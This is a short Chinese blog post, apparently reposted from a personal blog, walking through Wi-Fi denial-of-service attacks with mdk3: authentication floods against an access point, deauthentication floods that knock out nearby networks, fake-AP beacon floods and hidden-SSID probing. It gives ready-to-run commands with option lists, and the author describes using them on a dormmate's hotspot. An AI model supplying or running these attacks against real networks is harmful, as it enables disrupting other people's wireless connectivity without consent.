激活网卡为监听模式airmon-ng start wlan0扫描附近的无线信号airodump-ng mon0方法一：身份验证攻击这是一种验证请求攻击模式：在这个模式里，软件自动模拟随机产生的mac向目标AP发起大量验证请求，可以导致AP忙于处理过多的请求而停止对正常连接客户端的响应mdk3 mon0 a-a<ap_mac> #测试指定BSSID-m#使用有效数据库中的客户端mac地址-c#对应 -a ，不检查是否测试成功-i<ap_mac> #对指定BSSID进行智能攻击-s<pps> #速率，默认50mdk3 网卡 攻击模式 目标mdk3 mon0 a -a MAC

以下是攻击宿友电脑创建的无线，效果如下。

方法二：伪造断开连接在这个模式下，软件会向周围所有可见AP不断发出“断开连接”的包......可以造成一定范围内的无线网络瘫痪（当然有白名单，黑名单模式），直到手动停止攻击！mdk3 mon0 d-w<filename>            #白名单mac地址列表文件-b<filename>             #黑名单mac地址列表文件-s<pps>                       #速率，这个模式下默认无限制-c[chan,chan,chan,...]                 #信道，可以多填，如 2,4,5,1mdk3 mon0 d -c 11

以下是方法二测试视频：http://my.tv.sohu.com/us/235484955/76316147.shtml方法三：伪造AP产生大量死亡SSID来充斥无线客户端的无线列表，扰乱用户；还可以自定义发送死亡SSID的BSSID和ESSID、加密方式（如wep/wpa2）等。感觉鸡肋mdk3 mon0 b-n<ssid>       #自定义ESSID-f<filename>           #读取ESSID列表文件-v<filename>          #自定义ESSID和BSSID对应列表文件-d      #自定义为Ad-Hoc模式-w        #自定义为wep模式-g       #54Mbit模式-t  # WPA TKIP encryption-a#WPA AES encryption-m#读取数据库的mac地址-c<chan> #自定义信道-s<pps> #发包速率mdk3 --help b #查看详细内容

方法四：探测AP信息和ESSID猜解模式mdk3 mon0 p-e<ssid>         #待检测的ssid-f<filename>         #检测AP设置为隐藏的ssid列表文件-t<bssid>              #用bssid检测AP的信息-s<pps>               #速率，默认300-b<characterset>             #设置字符集转载请注明出处(http://www.jeehsu.com/1993.html)来源网站:几许博客